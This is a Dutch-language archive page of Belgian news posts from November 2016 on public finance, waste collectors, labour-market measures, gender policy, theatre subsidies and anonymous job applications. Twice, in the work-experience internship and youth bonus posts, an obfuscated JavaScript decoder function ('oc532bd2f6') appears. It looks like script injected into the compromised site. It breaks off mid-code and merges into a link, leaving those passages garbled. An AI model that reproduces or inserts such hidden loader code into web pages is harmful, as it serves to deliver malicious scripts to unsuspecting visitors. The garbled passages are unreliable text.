Archief november, 2016

Reacties uitgeschakeld voor Instantie van de week: Hoge Raad van Financiën

Instantie van de week: Hoge Raad van Financiën

Door | 19 november 2016 | Nieuws

Bron: eigen berichtgeving, 17/11/2016
Premier Charles Michel wil het Planbureau, de Nationale Bank en de Hoge Raad voor Financiën mee inschakelen om de kastanjes uit het begrotingsvuur te halen. Dat zei hij donderdag in de Kamer, waar de oppositie hem onder vuur nam over de begroting.
De Hoge Raad voor Financiën kwam deze week meermaals in het nieuws omdat Minister van Overveldt de Raad  gebruikte (volgens de oppositie ‘misbruikte’) om zijn eigen plannen te ondersteunen.
Het rapport van de HRF deed deze week veel stof opwaaien. De plannen om de vennootschapsbelasting te verlagen slaan geen gat in de begroting, zo klonk het eerst. Het bleek echter om een voorlopige nota te gaan die Van Overtveldt op eigen houtje had gevraagd. Nochtans was afgesproken dat premier Charles Michel een gecoördineerd advies zou vragen over de hervorming van de vennootschapsbelasting én de meerwaardebelasting, foeterde coalitiepartner CD&V, die hamert op de koppeling tussen beide dossiers.
Hoge Raad van Financiën

De leden van de Hoge Raad:

  • analyseren en bestuderen fundamentele problemen van budgettaire, financiële en fiscale aard;
  • en stellen wenselijke aanpassingen en hervormingen voor.

HET BUREAU

Binnen de Hoge Raad van Financiën functioneert een Bureau dat belast is met de voorbereiding en organisatie van de werkzaamheden van de Raad.

ORGANISATIE: TWEE PERMANENTE AFDELINGEN EN EEN STUDIECOMMISSIE

Sinds de hervorming van april 2006 telt de Hoge Raad van Financiën twee permanente afdelingen en een studiecommissie voor de vergrijzing (KB van 3 april 2006).

  1. Afdeling “Financieringsbehoeften van de Overheid”
  2. Afdeling “Fiscaliteit en Parafiscaliteit”
  3. Studiecommissie voor de Vergrijzing

SAMENSTELLING HOGE RAAD VAN FINANCIEN (JUNI 2016)

RAAD

Voorzitter

Johan VAN OVERTVELDT,
Minister van Financiën

Vice-voorzitter

Christine VANDERVEEREN,
Voorzitster in
afwezigheid van de Minister

Vice-voorzitter

Françoise MASAI,
Voorzitster Studiecommissie voor de Vergrijzing

BUREAU

Leden

Christine VANDERVEEREN
Françoise MASAI
Jan SMETS
Mathias DEWATRIPONT
Nico WAEYAERT
Pierre WUNSCH
Jan VERSCHOOTEN

FINANCIERINGS-
BEHOEFTEN

Voorzitter

Jan SMETS

Leden

Mathias DEWATRIPONT
Nico WAEYAERT
Norbert DE BATSELIER
Jean HILGERS
Pierre WUNSCH
Wivina DEMEESTER – DE MEYER
Edwin DE BOECK
André-Marie PONCELET
Sébastien DURIEUX
Christophe SOIL
Dirk DE SMEDT

Gérard SERVAIS (waarnemer)

Secretariaat

info.docufin@minfin.fed.be(link stuurt een e-mail)

FISCALITEIT EN PARAFISCALITEIT

Voorzitter

Didier LEEMANS

Leden

Marleen MANNEKENS
Jan VERHOEYE
Géraldine THIRY
Antoine DAYEZ
Herman MATTHIJS
Luc SIMAR
Axel HAELTERMAN
Christophe QUINTARD
Jan VERSCHOOTEN
Bernard JURION
Wim COUMANS

Secretariaat

info.docufin@minfin.fed.be(link stuurt een e-mail)

STUDIECOMMISSIE VOOR DE VERGRIJZING

Voorzitter

Françoise MASAI

Leden

Jan VERSCHOOTEN
Gert DE SMET
Henk BECQUAERT
Maurice WEBER
Michel ENGLERT
Marcia DE WACHTER

 

Secretariaat

info.docufin@minfin.fed.be

Reacties uitgeschakeld voor Week van de afvalophaler 21-25 november

Week van de afvalophaler 21-25 november

Door | 16 november 2016 | Nieuws

week van de afvalophaler

De week van 21 tot en met 25 november wordt gelanceerd als de ‘Week van de Afvalophaler’. In aanloop naar deze week en tijdens deze week roepen we mensen op om de afvalophaler en containerparkwachter te bedanken. Hoe? Daarvoor maakten we’ bedank-stickers’ die we verdelen via onze containerparken, gemeentehuizen en bibliotheken. Met de campagne vragen we respect voor de afvalophaler.

In Vlaanderen gaan elke dag honderden mensen de baan op voor de inzameling van het huishoudelijk afval. Ze trotseren hiervoor de weersomstandigheden maar ook het drukke verkeer. De ophaalwagens en de ophalers zijn met heel wat middelen uitgerust om dit op een veilige manier te doen. Toch hebben ze hun veiligheid niet volledig in eigen handen. Uit een steekproef bij de Vlaamse afvalinzamelaars in 2014 blijkt dat elke ophaler gemiddeld één keer per dag één geval van verkeersagressie ervaart, gaande van wild voorbijrazen tot fysiek en verbaal geweld. Dat betekent dat er dagelijks tussen 600 en 1.500 incidenten zijn. Dat alles is niet zonder gevaar voor de afvalophalers.

De Vlaamse intercommunales en Interafval* namen daarom het initiatief om een campagne op te zetten die oproept tot hoffelijk gedrag ten opzichte van afvalophalers. Dit gaat van hoffelijkheid in het verkeer tot beleefdheid en respect. IOK Afvalbeheer ondersteunt deze actie maximaal door een aantal lokale initiatieven.

De week van 21 tot en met 25 november wordt gelanceerd als de ‘Week van de Afvalophaler’. In aanloop naar deze week en tijdens deze week roepen we mensen op om de afvalophaler en containerparkwachter te bedanken. Hoe? Daarvoor maakten we’ bedank-stickers’ die we verdelen via onze containerparken, gemeentehuizen en bibliotheken. Interafval zorgt voor de verdeling van deze stickers via enkele magazines (de abonnees van Humo, TV-familie en Dag Allemaal). Deze stickers kunnen tijdens de week van de afvalophaler op de vuilniszak of –bak geplakt worden.

Wil je een stickervel ontvangen? Mail naar afvalbeheer@iok.be of bel 014 56 27 75.

Maar de stickers zijn maar een opstapje, een opgestoken hand of een ‘merci’ tijdens een ontmoeting met de parkwachter of ophaler kan al meer dan genoeg zijn. Een bijhorende tv-spot wordt uitgezonden op rtv en via sociale media verspreiden we meer informatie over de campagne en over de job van afvalophaler en containerparkwachter.

Enerzijds willen we met onze lokale invulling bij het grote publiek meer betrokkenheid creëren. Anderzijds willen we aan ons eigen personeel laten zien dat we de campagne nodig en belangrijk vinden.

Bron: IOK
Reacties uitgeschakeld voor Werkervaringsstage

Werkervaringsstage

Door | 14 november 2016 | Nieuws

De Vlaamse Regering wijzigt principieel haar besluit over de organisatie van de arbeidsbemiddeling en de beroepsopleiding met het oog op het creëren van een nieuwe vorm van  werkplekleren/stage: de werkervaringsstage. De werkervaringsstage moet een antwoord bieden voor werkzoekenden waar de afstand tot de arbeidsmarkt vooral te wijten is aan een gebrek aan (relevante) werkervaring en een gebrek aan generieke competenties (m.a.w. soft skills of arbeidsattitudes). Belangrijk is dat de werkzoekende de gelegenheid krijgt om deze werkervaring en generieke competenties te verwerven door middel van een stage op een reële werkvloer en binnen een realistische werkomgeving in het normaal economisch circuit. Over dit wijzigingsbesluit wordt nog advies ingewonnen van de SERV en daarna van de Raad van State.

 

 

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nl/vlaamse-regering/beslissingenvlaamseregering">https://www.vlaanderen.be/nl/vlaamse-regering/beslissingenvlaamseregering

Reacties uitgeschakeld voor Tewerkstelling jongeren in de social profitsector: afschaffen Jongerenbonus

Tewerkstelling jongeren in de social profitsector: afschaffen Jongerenbonus

Door | 14 november 2016 | Nieuws

Regeringsmededeling Vlaamse Regering
10 november 2016, op voorstel van minister Philippe Muyters
Door de staatshervorming werd Vlaanderen bevoegd voor de maatregel ‘jongerenbonus non-profit’, die zijn oorsprong vond in het Generatiepact. De doelstelling van de maatregel is het scheppen van bijkomende werkgelegenheid ten gunste van laaggeschoolde jongeren in de social-profitsector. Zoals voorzien bij de begrotingsopmaak 2017 beslist de Vlaamse Regering nu principieel tot uitdoving van de maatregel ‘jongerenbonus non-profit’. Concreet worden 3 acties voorgesteld: geen nieuwe aanwervingen of indiensttredingen mogelijk vanaf 1 januari 2017; werknemers die uitstromen uit de maatregel kunnen niet worden vervangen; en de lopende contracten, van werknemers die niet zijn uitgestroomd uit de maatregel, worden maximaal tot en met 31 december 2018 gesubsidieerd. Over dit besluit wordt nog advies ingewonnen van de Raad van State.

 

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nl/vlaamse-regering/beslissingenvlaamseregering">https://www.vlaanderen.be/nl/vlaamse-regering/beslissingenvlaamseregering

Reacties uitgeschakeld voor ‘Regering houdt te weinig rekening met vrouwen’

‘Regering houdt te weinig rekening met vrouwen’

Door | 14 november 2016 | Nieuws

Bron: De Standaard

Ministers van de federale regering voeren de gendertoets niet correct uit. De test word omzeild of halfslachtig ingevuld.

Dat schrijft De Morgen maandag op basis van beschuldigingen van het Instituut voor de Gelijkheid van Vrouwen en Mannen. Nieuwe wetten en maatregelen moeten aan een gendertoets worden onderworpen. Die test gaat na of geen van beide geslachten te zwaar wordt benadeeld door een ingreep.

Bevoegd staatssecretaris Elke Sleurs (N-VA) geeft toe dat er nog werk aan de winkel is, maar benadrukt dat ze ermee bezig is. Zo heeft ze extra opleidingen opgestart voor de kabinetten. Die moeten ertoe leiden dat er meer aandacht gaat naar de gelijkheid van mannen en vrouwen in het beleid.

Voor Groen is dit niet genoeg. De oppositiepartij eist dat de gendertoets serieus wordt genomen. ‘Een hele reeks maatregelen van deze regering treft vrouwen onevenredig hard. Deze ventenregering mist duidelijk de empathie om de gevolgen van haar beleid op vrouwen in te schatten’, klaagt Kamerlid Evita Willaert aan.

Willaert krijgt steun van Furia, het voormalige Vrouwen Overleg Komitee, die de gendertoets een ‘lege doos’ noemt.

Reacties uitgeschakeld voor Politieke cultuur in Cultuur.

Politieke cultuur in Cultuur.

Door | 7 november 2016 | Nieuws

“Antwerpse theatergezelschappen gered door lobbywerk De Wever”

07-11-16, Bron: De Morgen

1 Jan Decorte en Sigrid Vinks. ©©Danny Willems
Dat gezelschappen als Stan en De Roovers wel subsidies krijgen, en Bloet niet, is geen toeval. Dat zeggen Jan Decorte en Sigrid Vinks van Bloet in een interview met De Morgen, waarin ze scherp uithalen naar het subsidiebeleid van Vlaams minister van Cultuur Sven Gatz (Open Vld). “Door het lobbywerk van Bart De Wever (N-VA) en Philip Heylen (CD&V) zijn de Antwerpse gezelschappen op het laatste nippertje gered.”

Vanaf morgen staat Bloet op de planken met de voorstelling Ne Swarte, maar ook over wat daarna volgt wordt al druk nagedacht. Stand Down wordt een reactie op de beslissing die de overheid over het gezelschap heeft genomen door de subsidies te schrappen.

Vanaf 2017 moeten Jan Decorte en Sigrid Vinks het immers zonder subsidies doen, ondanks het advies van de beoordelingscommissie (200.000 euro). Minister van Cultuur Sven Gatz (Open Vld) besliste enkel organisaties te subsidiëren met een artistieke beoordeling van 'zeer goed' of 'goed'. Bloet scoorde slechts 'voldoende'.

SHARE
'Dit is een verhaal van Antwerps lobbywerk, niet meer of niet minder'
SIGRID VINKS
Net als organisaties als De Roovers en Stan, die uiteindelijk wel nog werden opgevist. "Waarom? Omdat Bart De Wever (N-VA, burgemeester van Antwerpen, red.) en Philip Heylen (CD&V, en in die tijd schepen van Cultuur en Economie, red.) naar Sven Gatz zijn gegaan op de avond voor de beslissing over de cultuursubsidies zou worden meegedeeld, en hem gezegd hebben dat de Antwerpse gezelschappen behouden moesten blijven. Een verhaal van Antwerps lobbywerk dus, niet meer of niet minder."

Ook over de argumentatie voor de beoordeling valt te twisten, zegt Sigrid Vinks. "In het verleden bestond de beoordelingscommissie uit mensen die het veld kenden. Dat was nu niet het geval. Een van de verwijten aan ons adres was bijvoorbeeld dat wij er nooit in geslaagd zijn om mainstream te worden. Wat ik als kunstenaar een bijzonder vreemd verwijt vind. Het hoofdargument van de commissie was dat ik geen inhoudelijk plan heb opgesteld voor de vijf volgende jaren. Maar hoe kun je nu als kunstenaar weten wat je de volgende vijf jaar gaat doen?"

"Regionale verhouding blijft gelijk"

Minister Gatz ontkent dat initiatieven uit Brussel benadeeld zouden worden ten opzichte van Antwerpse gezelschappen. "De regionale verhouding in de totale subsidiepot blijft ongeveer gelijk. Brussel gaat er zelfs met 600.000 euro op vooruit", laat hij weten in een reactie aan deze krant.

Over eventueel gelobby van Antwerps burgemeester Bart De Wever (N-VA) en toenmalig schepen voor Cultuur Philip Heylen (CD&V), wil het kabinet enkel kwijt dat "het Kunstendecreet een consultatieronde voorziet met steden en gemeenten, om lokale bevoegdheden de mogelijkheid te geven advies of inzicht te geven in de werking van het lokale kunstenlandschap".

http://www.demorgen.be/podium/-antwerpse-theatergezelschappen-gered-door-lobbywerk-de-wever-bbdb48bf/

Reacties uitgeschakeld voor Anoniem solliciteren lost discriminatie niet op

Anoniem solliciteren lost discriminatie niet op

Door | 5 november 2016 | Nieuws

Proefproject in Den Haag levert verbetering met maar 1 procentpunt op

05-11-16, Bron: De Morgen

1 Mensen met een migratie-achtergrond lijken het slachtoffer te worden van een maatregel die net goed voor hen zou moeten zijn. ©Getty Images/iStockphoto
Anoniem solliciteren is ook niet alles, zo blijkt uit een proefproject in het Nederlandse Den Haag. Zo steeg het aantal mensen met een migratie-achtergrond dat op gesprek mocht komen maar met 1 procentpunt.

Telkens als iemand in de eerste helft van dit jaar solliciteerde bij de gemeente Den Haag, maakten ambtenaren de naam, geboorteplaats en het geboorteland onleesbaar op de brief en het cv. Pas daarna ging alle informatie naar de sollicitatiecommissie. Geen mens die daar wist of het nu Mark of Mohammed was die zich aandiende voor de job.

Een beloftevol proefproject, zo klinkt het, want wie vroeger pessimistisch was, dacht nu wel een eerlijke kans te hebben op een sollicitatiegesprek. De gemeente gaat het systeem nu zelfs inzetten in de hele ambtelijke organisatie.

Wel opmerkelijk: de kans voor mensen met een migratie-achtergrond om op gesprek te komen steeg maar met 1 procentpunt. Van 7 procent in 2015 tot 8 procent nu. "Dat valt tegen", hekelt hoogleraar economie Robert Dur in Trouw. "Ik denk niet dat dat significant is."

'Bij een anonieme brief roep je geen verzachtende omstandigheden meer in. Dat is jammer'
STIJN BAERT, PROFESSOR ARBEIDSECONOMIE AAN DE UGENT
Eerdere studies in Nederland, Duitsland en Zweden gaven al aan dat anoniem solliciteren vaak veel minder loont dan gehoopt, signaleren experts. De meest gezaghebbende proef ooit was er een in Frankrijk, bij meer dan duizend bedrijven. Het ging om zowel hoog- als laagopgeleide jobs. "Tot ieders verbazing kregen minder mensen met een migratie-achtergrond een baan", vertelt Stijn Baert, professor arbeidseconomie aan de UGent. "Hetzelfde gold voor wie uit een achtergestelde wijk kwam. Ook voor hen pakte dat veel slechter uit."

Want, zo stellen kenners, als je anonimiseert, dan vermijd je niet alleen discriminatie, je voorkomt ook positieve discriminatie. Het maakt dat professor Baert geen groot voorstander is van de anonieme sollicitatiebrief. "Als werkgever ben je op die manier veel meer vastgepind op de objectieve feiten: welke scholing heeft die persoon? Moest hij of zij zittenblijven? Waarom was hij zolang werkloos? Staat daar nu een spelfout? Als je bij een niet-anonieme brief ziet dat het om iemand van vreemde origine gaat, kun je nog vergoelijken dat die persoon het even wat moeilijker zal hebben gehad, dat hij een taalprobleem moest wegwerken op school. Of dat hij geen sociaal netwerk heeft om een goed cv op te stellen. Die zaken kunnen bij een anonieme brief niet meer worden gecompenseerd. Je roept geen verzachtende omstandigheden meer in. Dat is jammer."

Keuze snel gemaakt

Ironisch toch, hoe mensen van vreemde origine het slachtoffer lijken te worden van een maatregel die net goed voor hen zou moeten zijn. Is de anonimiteit dan geen goed idee? Drie jaar geleden, toen oud-minister van Werk Monica De Coninck (sp.a) de Nationale Arbeidsraad het plan liet onderzoeken, gingen de werkgeversorganisaties alleszins op hun achterste poten staan. "Een administratieve rompslomp", noemden zij het. "Een dure maatregel ook."

'Werkgevers willen niet kiezen voor iets smaakloos, geurloos en kleurloos'
STIJN BAERT, PROFESSOR ARBEIDSECONOMIE AAN DE UGENT
Anoniem of niet? Bij overheidsinstellingen zal het misschien niet zoveel meer uitmaken, menen experts. Omdat zij doorgaans al meer rekening houden met diversiteit: met gender, sociale achtergrond en etniciteit. "Maar in andere sectoren toont de werkelijkheid nog een ander beeld", duidt Sana Sellami, die vorig jaar haar doctoraat in de sociaal-economische wetenschappen behaalde. "Daar kun je als iemand met een migratie-achtergrond vlot door de sollicitatieronde geraken, maar zal de drempel bij het gesprek zelf hoger liggen. Niet overal, natuurlijk. Maar als de werkgever echt een keuze kan maken tussen de twee profielen, dan is ze vaak snel gemaakt."

Een totaalprofiel dat zich onderscheidt, dat is waar werkgevers voor willen gaan, meent professor Stijn Baert nog. Zo toonde een Vlaams onderzoek met fictieve sollicitaties aan dat mensen met een migratie-achtergrond die vrijwilligerswerk doen bij de Stichting tegen Kanker of bij een korfbalclub niet langer discriminatie ondervonden. Baert: "Daar komt het vooral op neer: werkgevers willen niet kiezen voor iets smaakloos, geurloos en kleurloos."